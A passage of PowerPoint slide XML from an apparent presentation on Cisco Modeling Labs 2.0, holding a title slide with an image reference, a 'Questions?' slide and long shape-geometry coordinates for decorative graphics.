        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203872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15443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CML (Cisco Modeling Labs) 2.0 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF2ACEF-138A-4297-832D-9ECF88C3EB7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="971550"/>
            <a:ext cx="7620000" cy="3643158"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="519970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5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9144000" cy="51435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34923" y="4712968"/>
              <a:ext cx="1108709" cy="37185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0" y="0"/>
              <a:ext cx="9144000" cy="5143499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:blipFill>
              <a:blip r:embed="rId4" cstate="print"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498855" y="2292096"/>
            <a:ext cx="2106930" cy="513080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr sz="32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002539"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5157215" y="470916"/>
            <a:ext cx="3986529" cy="4201795"/>
            <a:chOff x="5157215" y="470916"/>
            <a:chExt cx="3986529" cy="4201795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6380225" y="1028700"/>
              <a:ext cx="1947545" cy="3131185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1947545" h="3131185">
                  <a:moveTo>
                    <a:pt x="158876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="8095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="30626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="64958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="108460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1316227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1366511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1410163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1444573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1467132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="1475232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="1467132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="1444573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="1410163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="1366511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="1316227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="158496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="108460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="64958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="30626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="8095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1947545" h="3131185">
                  <a:moveTo>
                    <a:pt x="566674" y="1097914"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="516452" y="1106013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="1128565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="1162956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="1206570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="1256792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="2414143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="2464178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="2507680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="2542012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516452" y="2564543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="2572639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616709" y="2564543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660211" y="2542012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694543" y="2507680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717074" y="2464178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725170" y="2414143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725170" y="1256792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717074" y="1206570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694543" y="1162956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660211" y="1128565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616709" y="1106013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="1097914"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1947545" h="3131185">
                  <a:moveTo>
                    <a:pt x="1788287" y="1655318"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="1663429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="1686013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="1720441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="1764086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629918" y="1814322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629918" y="2972092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="3022125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="3065632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="3099974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="3122514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="3130613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838508" y="3122514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882122" y="3099974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916513" y="3065632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939065" y="3022125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947164" y="2972092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947164" y="1814322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939065" y="1764086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916513" y="1720441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882122" y="1686013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838508" y="1663429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="1655318"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="74BE4A"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5973317" y="470916"/>
              <a:ext cx="3170555" cy="4201795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3170554" h="4201795">
                  <a:moveTo>
                    <a:pt x="158877" y="1655572"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1663670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1686222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1720613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1764227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1814449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2971546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="3021581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="3065083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="3099415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="3121946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158877" y="3130042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="3121946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="3099415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="3065083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="3021581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="2971546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="1814449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="1764227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="1720613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="1686222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="1663670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158877" y="1655572"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3170554" h="4201795">
                  <a:moveTo>
                    <a:pt x="1788795" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1738821" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695357" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661044" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638520" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630426" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630426" y="1316101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638520" y="1366322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661044" y="1409936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695357" y="1444327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738821" y="1466879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788795" y="1474978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839078" y="1466879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882730" y="1444327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917140" y="1409936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939699" y="1366322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947799" y="1316101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947799" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939699" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917140" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882730" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839078" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788795" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3170554" h="4201795">
                  <a:moveTo>
                    <a:pt x="3011297" y="2726182"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2961061" y="2734281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2917416" y="2756840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882988" y="2791250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860404" y="2834902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852292" y="2885186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852292" y="4042727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860404" y="4092753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882988" y="4136253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2917416" y="4170589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2961061" y="4193125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011297" y="4201223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061518" y="4193125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105132" y="4170589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139523" y="4136253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3162075" y="4092753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170174" y="4042727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170174" y="2885186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3162075" y="2834902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139523" y="2791250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105132" y="2756840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061518" y="2734281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011297" y="2726182"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E1221A"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5566409" y="1541526"/>
              <a:ext cx="3577590" cy="2616835"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="973200" y="1141603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="922979" y="1149701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879365" y="1172253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844974" y="1206644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822422" y="1250258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814324" y="1300480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814324" y="2457805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822422" y="2507818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844974" y="2551307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879365" y="2585635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922979" y="2608167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973200" y="2616263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023174" y="2608167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066638" y="2585635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100951" y="2551307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123475" y="2507818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131569" y="2457805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131569" y="1300480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123475" y="1250258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100951" y="1206644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066638" y="1172253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023174" y="1149701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973200" y="1141603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="1788287" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629917" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629917" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="1474216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838570" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882222" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916632" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939191" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947290" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947290" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939191" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916632" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882222" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838570" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="3418205" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3367983" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324369" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3289978" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267426" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267426" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3289978" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324369" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3367983" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="1474216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="158876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="1474216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252548" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286993" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309618" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317753" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317753" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309618" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286993" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252548" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
